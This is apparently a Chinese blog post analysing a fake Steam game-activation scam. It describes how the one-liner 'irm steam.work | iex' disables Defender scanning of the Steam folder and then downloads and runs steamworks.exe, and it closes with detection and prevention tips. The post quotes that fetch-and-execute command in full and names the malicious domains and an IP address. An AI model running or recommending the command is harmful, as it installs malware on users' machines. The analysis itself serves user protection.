一、假入库命令分析
假入库命令:irm steam.work | iex
1. irm指令
向指定网站发送请求,并返回信息
终端权限判断
3. 通过查找注册表信息获取到steam安装路径
例如最终获得的steamPath为C:/programs/steam
获取steam安装路径
4. 判断Windows Defender状态
如果开启,则将steam路径加入其排除路径,并指定不扫描该路径下的dll与exe文件
检测Defender相关设置
5. 下载病毒文件,并执行
从指定链接下载一个名为“steamworks.exe“的文件,保存到steam安装路径下,并直接执行该文件。涉及到的两个域名下面会展示相关信息。
下载文件
三、Steamworks.exe文件
正版steam安装路径下并不会存在该文件,此程序为盗版假入库的验证程序。通过将商家cdk发送到后台API进行验证,判断该cdk是否正确(自己做的后台,管理并生成盗版cdk,并通过自己的后台进行验证)。之后应该会根据返回结果来欺骗steam来下载游戏,实现假入库。但是本人技术有限,无法对exe文件进行逆向分析。
通过抓包发现,输入盗版cdk之后,该exe文件会向“111.230.239.121“发起一个GET请求。接口为”/cdk.php”,请求参数为”cdk=盗版cdk值进行后台校验”。
WireShark抓包
请求测试接口
四、涉及到的域名
做这种东西居然都用的国内服务器,并且还使用在工信部进行备案过的域名,可以查到两个域名均为企业备案,并可以查询到相应的工商登记信息。
1. Steam.work
假入库脚本请求域名
steam.work ICP备案信息
steam.work 备案主体工商登记信息
2. Haory.cn
假入库文件下载域名
haory.cn ICP备案信息
haory.cn 备案主体工商登记信息
五、检查以及预防
假入库这种方式会在steam安装目录下加入其他文件,如此脚本中下载的“steamworks.exe“,还有部分帖子提到的”hid.dll“。同时可以检查Windows Defender等自己电脑上的安全管理软件是否把steam目录加入了排除扫描目录。
其实只要掌握好管理员权限就不会发生这种情况,正常玩家玩游戏以及官方入库是不会涉及到使用管理员权限的。
Steam入库不需要使用第三方脚本或者软件,直接进入steam从左下角添加游戏->在steam上激活产品。当然,要是找不到这个选项可能你的steam自己也存在问题。
下面两幅图是盗版激活与正版激活的界面,仔细观察也是存在差异的,包括分辨率以及字体、背景颜色等。尤其是正版激活界面不输入cdk,确认按钮不会变蓝色,盗版始终为蓝色。
盗版入库界面
正版入库界面
#免责声明#
①本站部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
②若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。
③如果本站有侵犯、不妥之处的资源,请联系我们。将会第一时间解决!
④本站部分内容均由互联网收集整理,仅供大家参考、学习,不存在任何商业目的与商业用途。
⑤本站提供的所有资源仅供参考学习使用,版权归原著所有,禁止下载本站资源参与任何商业和非法行为,请于24小时之内删除!
